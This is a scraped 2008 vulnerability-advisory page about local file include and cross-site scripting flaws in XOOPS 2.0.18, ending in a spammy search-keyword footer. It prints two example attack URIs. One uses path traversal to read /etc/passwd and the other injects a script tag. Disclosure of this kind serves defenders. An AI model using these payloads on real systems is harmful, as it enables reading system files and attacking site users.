about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , XOOPS Local File Include and Cross Site Scripting Vulnerabilities


Title XOOPS Local File Include and Cross Site Scripting Vulnerabilities
Published 2008-07-21-12:00AM
Updated 2008-07-22-09:28PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Ciph3r
Vulnerable  Xoops Xoops 2.0.18 1
Not Vulnerable  
Code  Attackers can exploit this issue via a browser.The following example URIs are available:For the local file-include issue:http://www.example.com/scripts_path/modules/system/admin.php?fct=../../../../../../../../../../etc/passwd%00For the cross-site scripting issue:http://www.example.com/scripts_path/modules/system/admin.php?fct="><script>alert("xss")</script>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 22:30:02 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
dawid+tawa UBB.thread news searc news searc NAYANTHARA Www.Bollyw www.sxs.ne FAMILY sex joomap desi babes Sex wall php-nuke 2 mini downlode inclu MySql 4.0. Sexs.com fortinet p Fifa 2006 pinkword.c gey sex.ht Thirars 0002 WWW.BFSEXY partysex WinZip bibass.com Www.89sex. xvidios www bolly spoolview PHPNuke CMS is Fre corrinb NHL xxx sex/po champions WWW.BFSEXY xvidios Muy zorras Www.fatoms joomla com Vulnerabi hack ftp mambo Remo 5H1 www.tamiIs security.d exploit ip Red tube v